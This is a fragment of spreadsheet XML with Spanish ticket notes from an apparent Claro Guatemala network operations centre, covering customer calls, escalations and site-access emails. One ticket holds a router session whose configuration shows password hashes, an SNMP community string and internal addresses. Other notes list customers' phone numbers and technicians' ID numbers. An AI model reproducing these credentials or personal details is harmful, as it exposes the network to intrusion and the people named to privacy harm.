    <t>SE LLAMÓ/HABLÓ CON SILVIA LEIVA/EJECUTIVA CLARO 58260474 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>.SE LLAMA A SILVIA LEIVA 58260474 MENCIONA QUE EL TICKET FUE APERTURADO A SOLICITUD DE CNOOC PORQUE NO LE LLEGAN A LOS EQUIPOS DE UM
-ID 20010055807</t>
  </si>
  <si>
    <t>F4594252</t>
  </si>
  <si>
    <t>F4594257</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DOUGLAS VALENZUELA AL 54933959  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001069884
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DOUGLAS VALENZUELA 54933959 MENCIONA QUE ELL SERVICIO ESTA OPERATIVO POR LO QUE SOLICITA LLAMADA PARA LAS 16:00 HRS
-ID 2001013138</t>
  </si>
  <si>
    <t>F4594261</t>
  </si>
  <si>
    <t>F4594280</t>
  </si>
  <si>
    <t>CLIENTE TOP, DEBIDO A QUE NO SE HA TENIDO SEGUIMIENTO POR PARTE DE CNOC CLARO; SE ESCALA CON KEVYN FONSECA/TEAM LEADER CNOC; ÉSTE INDICA QUE NOS APOYARÁ CON GESTOR ASIGNADO.</t>
  </si>
  <si>
    <t>F4594299</t>
  </si>
  <si>
    <t>ENLACE UP
&lt;GNCYGTUTN1C1B08B02EIM3&gt;PING -VPN-INSTANCE OPTICOSUNIDOS 10.78.67.70
  PING 10.78.67.70: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.78.67.70: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.78.67.70: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.78.67.70: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.78.67.70: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.78.67.70: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.78.67.70 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;GNCYGTUTN1C1B08B02EIM3&gt;TELNET VPN-INSTANCE OPTICOSUNIDOS 10.78.67.70
TRYING 10.78.67.70 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.78.67.70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CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO&gt;ENA
PASSWORD:
CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4076 BYTES
!
VERSION 15.4
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$NQYN$IGV4GHKMWF5SU77ZJID8J1
!
NO AAA NEW-MODEL
!
!
!
!
!
!
!
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1921/K9 SN FJC2023L2D5
!
!
USERNAME GESTIONIP SECRET 5 $1$R5BP$8QHCRNRZ7QMKUPACN7/NC1
!
REDUNDANCY
!
!
!
CLASS-MAP MATCH-ANY SERVIDOR
 MATCH IP DSCP AF21
CLASS-MAP MATCH-ANY RTP_SERVIDOR
 MATCH ACCESS-GROUP 120
CLASS-MAP MATCH-ANY AUDIO
 MATCH IP DSCP EF
CLASS-MAP MATCH-ANY SIGNALING
 MATCH PROTOCOL SIP
 MATCH ACCESS-GROUP 101
CLASS-MAP MATCH-ANY RTP_AUDIO
 MATCH PROTOCOL RTP AUDIO
 MATCH ACCESS-GROUP 102
 MATCH ACCESS-GROUP 110
CLASS-MAP MATCH-ANY SIP-SIGN
 MATCH IP DSCP AF31
!
POLICY-MAP MARK
 CLASS SIGNALING
  SET DSCP AF31
 CLASS RTP_AUDIO
  SET DSCP EF
 CLASS RTP_SERVIDOR
CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO#SH ORUN
                                             ^
% INVALID INPUT DETECTED AT '^' MARKER.
CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO#    SHOW RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4076 BYTES
!
VERSION 15.4
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$NQYN$IGV4GHKMWF5SU77ZJID8J1
!
NO AAA NEW-MODEL
!
!
!
!
!
!
!
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1921/K9 SN FJC2023L2D5
!
!
USERNAME GESTIONIP SECRET 5 $1$R5BP$8QHCRNRZ7QMKUPACN7/NC1
!
REDUNDANCY
!
!
!
CLASS-MAP MATCH-ANY SERVIDOR
 MATCH IP DSCP AF21
CLASS-MAP MATCH-ANY RTP_SERVIDOR
 MATCH ACCESS-GROUP 120
CLASS-MAP MATCH-ANY AUDIO
 MATCH IP DSCP EF
CLASS-MAP MATCH-ANY SIGNALING
 MATCH PROTOCOL SIP
 MATCH ACCESS-GROUP 101
CLASS-MAP MATCH-ANY RTP_AUDIO
 MATCH PROTOCOL RTP AUDIO
 MATCH ACCESS-GROUP 102
 MATCH ACCESS-GROUP 110
CLASS-MAP MATCH-ANY SIP-SIGN
 MATCH IP DSCP AF31
!
POLICY-MAP MARK
 CLASS SIGNALING
  SET DSCP AF31
 CLASS RTP_AUDIO
  SET DSCP EF
 CLASS RTP_SERVIDOR
  SET DSCP AF21
POLICY-MAP CB
 CLASS AUDIO
  PRIORITY PERCENT 4
 CLASS SIP-SIGN
  PRIORITY PERCENT 2
 CLASS SERVIDOR
  POLICE CIR PERCENT 75 CONFORM-ACTION TRANSMIT  EXCEED-ACTION DROP  VIOLATE-ACTION DROP
 CLASS CLASS-DEFAULT
  FAIR-QUEUE
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.143.75 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/406400042T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.78.67.70 255.255.255.248
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
 SERVICE-POLICY OUTPUT CB
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 2048
 IP ADDRESS 192.168.42.1 255.255.255.0
 IP NBAR PROTOCOL-DISCOVERY
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
 SERVICE-POLICY INPUT MARK
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.78.67.65
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION 23 CALLE 10-00 ZONA 4 CONDADO NARANJO MIXCO C.C. NARANJO MALL LOCAL L-121, MIXCO
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 101 PERMIT TCP ANY ANY RANGE 2000 2002
ACCESS-LIST 101 PERMIT TCP ANY ANY EQ 1720
ACCESS-LIST 101 PERMIT TCP ANY ANY RANGE 11000 11999
ACCESS-LIST 101 PERMIT UDP ANY ANY EQ 2427
ACCESS-LIST 101 PERMIT TCP ANY ANY EQ 2428
ACCESS-LIST 101 PERMIT UDP ANY ANY EQ 1719
ACCESS-LIST 101 PERMIT UDP ANY ANY EQ 5060
ACCESS-LIST 102 REMARK VOIP_RTP
ACCESS-LIST 102 PERMIT UDP ANY ANY RANGE 16384 32767
ACCESS-LIST 110 REMARK CLIENTES_VOIP
ACCESS-LIST 110 PERMIT IP HOST 192.168.42.5 ANY
ACCESS-LIST 120 REMARK SERVIDOR
ACCESS-LIST 120 PERMIT IP HOST 192.168.0.253 ANY
!
CONTROL-PLANE
!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UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO#     SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.78.67.65             2   B443.2600.DDE5  ARPA   GIGABITETHERNET0/0
INTERNET  10.78.67.70             -   0062.EC87.E160  ARPA   GIGABITETHERNET0/0
INTERNET  192.168.42.1            -   0062.EC87.E161  ARPA   GIGABITETHERNET0/1
INTERNET  192.168.42.2            2   4016.7E18.3CC9  ARPA   GIGABITETHERNET0/1
INTERNET  192.168.42.5            6   0060.B9A5.BB6C  ARPA   GIGABITETHERNET0/1
INTERNET  192.168.42.6            0   8082.8702.81E4  ARPA   GIGABITETHERNET0/1
CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO#SHO IP INT BRIUE
                                                       ^
% INVALID INPUT DETECTED AT '^' MARKER.
CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO#SHO IP INT BRI
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.78.67.70     YES NVRAM  UP                    UP
GIGABITETHERNET0/1         192.168.42.1    YES NVRAM  UP                    UP
LOOPBACK5                  10.212.143.75   YES NVRAM  UP                    UP
CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO#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UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO UPTIME IS 31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023L2D5
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245744K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#   PID                   SN
-------------------------------------------------
*1        CISCO1921/K9          FJC2023L2D5
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
NTWKESS       NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO#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000         5      5000         5         0
* GIGABITETHERNET0/1            0         0         0         0         0         0         0         0         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO#CONF T
ENTER CONFIGURATION COMMANDS, ONE PER LINE.  END WITH CNTL/Z.
CC_UNIVERSO_OPTICO_G(CONFIG)#NO IP DOMAN
CC_UNIVERSO_OPTICO_G(CONFIG)#NO IP DOMA
CC_UNIVERSO_OPTICO_G(CONFIG)#NO IP DOMAIN LO
CC_UNIVERSO_OPTICO_G(CONFIG)#NO IP DOMAIN LOOKUP
CC_UNIVERSO_OPTICO_G(CONFIG)#EXIT
CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO#WE
TRANSLATING "WE"
% BAD IP ADDRESS OR HOST NAME
TRANSLATING "WE"
% UNKNOWN COMMAND OR COMPUTER NAME, OR UNABLE TO FIND COMPUTER ADDRESS
CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO#WR
BUILDING CONFIGURATION...
[OK]
CC_UNIVERSO_OPTICO_GT_NARANJO_MALL_MIXCO#</t>
  </si>
  <si>
    <t>-* SE HABLA CON MELVIN SANDOVAL (CLIENTE) SE LE INFORMA SOBRE EL PROCESO DE PRUEBAS PENDIENTES, COMENTA QUE ESTARA ATENTO -*
-*</t>
  </si>
  <si>
    <t>F4594321</t>
  </si>
  <si>
    <t>SE LLAMA A CLENTE FERNANDO CHIROY 42162533 MENCIONA QUE EL SERVICIO ES MUY INESTABLE, LA MAYORIA DE FINES DE SEMANA PRESENTA CAIDA CN EL SERVICIO
CLIENTE SOLICITA LLAMADA PARA EL LUNES A LAS 9:30
-ID 1001998775</t>
  </si>
  <si>
    <t>**SE  LLAMA A CLIENTE EDWIN JURACAN AL 41498782 INDICA QUE POR EL MOMENTO ESTA ESTABLE Y OPERATIVO PERO NO DESEA QUE SE PROCEDA AL CIERRE DEL TICKET YA QUE HA ESTADO MUY INESTABLE INIDCA QUE ANOCHE A MEDIA NOCHE SE  LE VOLVIO A CAER EL SERVICIO Y TUVO QUE REINICIAR EL EQUIPO PROBLEMAS DE ENERGIA NO CREE QUE SEAN YA QUE EN EL LUGAR INDICA QUE CUENTAN CON REGULADORES SOLICITA QUE SE DEJE EN OBSERVACION POR 1 SEMANA || SE NOTIFICA A GESTOR **
-ID 1001137587
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO CHIROY 42162533 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001808431</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE EDWIN COMENTA QUE SE TIENEN CAIDAS DEL SERVICIO, SE VALIDA EN EL ROUTER QUE NO CUENTA CON LOG POR LO QUE SE MANTENDRA EN OBSERVACION,EL DIA DE HOY,
2001949340
COLA:
NOMBRE: A: 41498782
NÚMERO: 41498782
DURACIÓN: 0:03:52
ESTADO: CONECTADA
DETALLES: 41498782
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 13/06/2022 15:55:16</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO CHIROY AL 42162533 NO RESPONDE ENVIA A BUZON | SE INTENTARA LUEGO **
-ID 2001944067
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO CHIROY AL 42162533 SE BRINDA RETROALIMENTACION Y SE CONSULTA SI TIENEN ENERGIA E INDICA QUE SI HAY ENERGIA ELECTRICA**
-ID 2001903646
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN JURACAN AL 41498782 CLIENTE CONFIRMA SERVICIO OK SE LE INDICA QUE TAMBIEN ESTA SATURANDO EL SERVICIO **
-ID 2001944512
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN JURACAN 41498782 MENCIONA QUE EL INCONVENIENTE ES RECURRENTE POR LO QUE SOLICITA LLAMADA PARA EL DIA LUNES 20/06 A LAS 16:30 HRS VALIDAR EL FUNCIONAMIENTO
-ID 3001029636</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SE DEBE VALIDAR SERVICIO HASTA EL DÍA LUNES 20 A LAS 16:30 HORAS, LO ANTERIOR A SOLICITUD DE CLIENTE</t>
  </si>
  <si>
    <t>F4594324</t>
  </si>
  <si>
    <t>SE LLAMA A RENE PARA REALIZAR PRUEBAS PERO NO RESPONDE---
63132855</t>
  </si>
  <si>
    <t>SE LLAMA A RENE PARA REALIZAR PRUEBAS PERO NO RESPONDE--
63132855</t>
  </si>
  <si>
    <t>F4594326</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE VILLEDA 31808554 MENCIONA QUE AUN PERSISTE EL INCONVENIENTE, CLIENTE INDICA QUE ENVIARA EL LINK DE UNA TEAMS O MEET POR CORREO
SE LE BRINDAN LOS CORRREOS DE CNOCCA Y N1
-ID 2001087471</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE VILLEDA  AL 31808554  CL  NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001082254
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE VILLEDA 31808554 MENCIONA QUE NECESITA REALIZAR PRUEBAS POR LO QUE SOLICITA SE DE SEGUIMIENTO A LAS 20:00 HRS
-ID 2001144976</t>
  </si>
  <si>
    <t>F4594343</t>
  </si>
  <si>
    <t>####SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS ###
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 13:36
PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | BANCO DE DESARROLLO RURAL, S.A. |REDUNDANCIA WIMAX.- 0 AVENIDA 5-73 ZONA 6, COLONIA LOS ALAMOS, GUATEMALA VILLA CANALES - U PANAMERICANA
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO  BANCO DE DESARROLLO RURAL, S.A.  |REDUNDANCIA WIMAX.- 0 AVENIDA 5-73 ZONA 6, COLONIA LOS ALAMOS, GUATEMALA VILLA CANALES - U PANAMERICANA
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
650283     GUSTAVO MURALLES                                    1687060320107 31359374
531718     MAYNOR ALEXANDER CABRERA LIX             2388 41235 1414 58261468
975071     GANDHI JOSÉ GARCÍA QUIÑÓNEZ                2602 73627 0401 58264829
633756     JULIO ARIEL LÓPEZ GARCÍA                           1574 97658 0917 58264139
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4594344</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ORBIT ARIAZA AL 55550158 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001021693
**</t>
  </si>
  <si>
    <t>F4594345</t>
  </si>
  <si>
    <t>CLIENTE WILLIAM MAZARIEGOS 56250747  VALIDA EL E1 OPERATIVO AUTORIZA EL CIERRE DEL CASO. RESULTADO: LLAMADA HECHA
NOMBRE: 56250747
NÚMERO: 56250747
INICIO: HOY, 01:11 P. M.
FIN: HOY, 01:13 P. M.
DURACIÓN: 1:53
ID DE LLAMADA: 2001016501</t>
  </si>
  <si>
    <t>F4594350</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 17:51
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; GERALD TORRES (VENDOR) &lt;GERALD.TORRES@WALMART.COM&gt;; YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE PALI COYOL ID: CONTR0001398216OC
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4594369</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL ESCOBAR 22815810 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001149895</t>
  </si>
  <si>
    <t>F4594385</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE LESLI 47349407 INDICA QUE TIENE PROBLEMAS CON LA EXTENSIÓN NUMERO 5 DE SU IVR, AL MARCAR DICHA OPCIÓN SUENA MÚSICA DE ESPERA Y DESPUÉS DA UN PITIDO, SUS TELÉFONOS NO TIMBRAN, SE SOLICITA AL CLIENTE QUE ESCALE EL INCONVENIENTE CON SU PROVEEDOR, SE PROCEDE AL CIERRE DEL TICKET
2001014456
NOTA: SE REALIZAN LLAMADAS DE PRUEBA CON LAS EXTENSIONES 1 Y 2, LAS LLAMADAS COMPLETAN CORRECTAMENTE
2494-8100 EXTENSIÓN 1 (PASEO SAN ISIDRO), SUENA MÚSICA DE ESPERA Y AL POCO TIEMPO ATIENDE EL OPERADOR
2494-8100 EXTENSIÓN 2 (PLAZA SANTA AMELIA ), SUENA MÚSICA DE ESPERA Y AL POCO TIEMPO ATIENDE EL OPERADOR
2494-8100 EXTENSIÓN 5 (PORTALES), SUENA MÚSICA DE ESPERA, DESPUÉS UN PITIDO Y LA LLAMADA SE CORTA (ID 2001020857)</t>
  </si>
  <si>
    <t>F4594386</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JOSÉ OSWALDO AL 52 55 5174-5299 CONTESTA MONSERRAT GARRIDO CONFIRMA SERVICIO ESTABLE Y AUTORIZA CIERRE DE TICKET **
-ID 2001025632
**</t>
  </si>
  <si>
    <t>F4594408</t>
  </si>
  <si>
    <t>SE ESTA EN LINEA  CON EL CLIENTE MARIA JOSE BATRES  QUIEN  SOLICITA UNOS MOMENTOS PARA VALIDAR.
2001018935
COLA:
NOMBRE: A: 35709060
NÚMERO: 35709060
DURACIÓN: 0:00:50
ESTADO: CONECTADA
DETALLES: 35709060
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 8/06/2022 13:19:54</t>
  </si>
  <si>
    <t>F4594417</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE MARIBLE DE LOPEZ 76017328 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001038744</t>
  </si>
  <si>
    <t>F4594427</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  RESPONDE SAUL ORELLANA MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO
-ID 2001040429</t>
  </si>
  <si>
    <t>F4594429</t>
  </si>
  <si>
    <t>ENLACE EN OBSERVACIÓN, SE DEBERÁ CONTACTAR A CLIENTE EL DÍA JUEVES 16 DEL PRESENTE MES PARA VALIDAR SI SE HAN INSTALADO NUEVOS UPS.</t>
  </si>
  <si>
    <t>F4594445</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAFAEL  AGUIRRE 25247600 - 75551360 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001214535 - 2001214663</t>
  </si>
  <si>
    <t>NOS CONTESTA OTRO COMPAÑERO (NO QUISO BRINDAR SU NOMBRE) QUIEN INDICA QUE RAFAEL SE ENCUENTRA OCUPADO EN EL AREA DE BODEGA Y QUE SI SE LE PUEDE LLAMAR NUEVAMENTE EN 30 MIN MIENTRAS EL TERMINA DE REALIZAR SUS LABORES EN ESA AREA. SE LE CONSULTA DE LA AFECTACION PERO INDICA QUE DESCONOCE EL REPORTE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE RAFAEL  AGUIRRE GALVEZ 25247600 Y 75551360 PARA VALIDAR CUAL ES EL INCONVENIENTE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE RAFAEL AGUIRRE QUIEN SOLICITA SE DEJE EN OBSERVACION HASTA EL DIA DE MAÑANA A LAS 12:00HRS YA QUE NECESITA REALIZAR PRUEBAS.
2001103658
COLA:
NOMBRE: A: 0050375551360
NÚMERO: 0050375551360
DURACIÓN: 0:00:15
ESTADO: CONECTADA
DETALLES: 0050375551360
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 8/06/2022 18:25:18</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE RAFAEL  AGUIRRE GALVEZ 25247600 Y 75551360
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4594451</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS
DE: CARLOS EDGARDO ICHEL ESCOBAR
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 17:31
PARA: WCHAVARRIA@BANCATLAN.HN &lt;WCHAVARRIA@BANCATLAN.HN&gt;
CC: NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: F4594451 || 1030344OH || BANCO LA GRECIA.
BUENAS TARDES APRECIABLE CLIENTE
SOLICITAMOS DE SU APOYO COORDINANDO ACCESOS A NUESTRO PERSONAL
FAVOR SU APOYO BRINDARNOS FECHA Y HORA DE VISITA POR FAVOR.
NOMBRE DEL CLIENTE: BANCO ATLANTIDA S A  -
UBICACIÓN LA GRECIA MARCOVIA, CHOLUTECA, KM 21 CARRETERA A CEDEÑO.  13.242451, -87.353888
EMPRESA NOMBRE ID TELÉFONO
AVANTEC NELSON OMAR ORELLANA AVILA 0801.1976.06689
AVANTEC YEFRI ANAEL OSORTO RODRIGUEZ 0601-2002-02369</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTHER CHAVARRIA 97532076 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001099201</t>
  </si>
  <si>
    <t>F4594454</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
MIÉ 08/06/2022 2:39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3237¿¿¿¿ ¿¿¿¿¿¿¿¿¿¿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4454¿¿
ID: 47502249T¿¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM3237
UBICADO EN:
CAJERO 3237 EXPENDIO BIMBO, 6 CALLE 11-63 ZONA 3 ALDEA BARCENAS VILLA NUEVADE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4594461</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE PARA QUE AUTORICE LOS PERMISOS EL DIA DE MAÑANA
BUENAS TARDES,
ESTIMADOS ENVIÓ LOS DATOS DE LOS TÉCNICOS QUE ESTARÁN LLEGANDO EL DÍA DE MAÑANA A PARTIR DE LAS 8:00AM.
EMPRESA
NOMBRE
ID
GEORED
CARLOS HUMBERTO MOLINA
1623-1983-00742
GEORED
ANGEL GABRIEL GOMEZ
0801-1985-10526
GEORED
MARVIN ALEXIS MARADIAGA
0714-1988-00271</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE FERNANDO BANEGAS. QUIEN SOLICITA SE REALICE LA VISITA TECNICA EL DIA DE MAÑANA A PARTIR DE LAS 8:00AM
DEBIDO A ESTE COMENTARIO SE CAMBIA DE ETAPA EL TICKET.
2001037284
COLA:
NOMBRE: A: 0050432150126
NÚMERO: 0050432150126
DURACIÓN: 0:00:26
ESTADO: MARCANDO
DETALLES: 0050432150126
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 8/06/2022 14:20:42</t>
  </si>
  <si>
    <t>F4594466</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARVIN OCHOA 47213068 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001152308</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARVIN OCHOA 47213068 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001191320</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARVIN OCHOA 47213068 MENCIONA QUE OBSERVA OPERATIVO EL SERVICIO PERO POR SER MUY RECURRENTE EL PROBLEMA SOLICITA LLAMADA PARA LAS 10:30
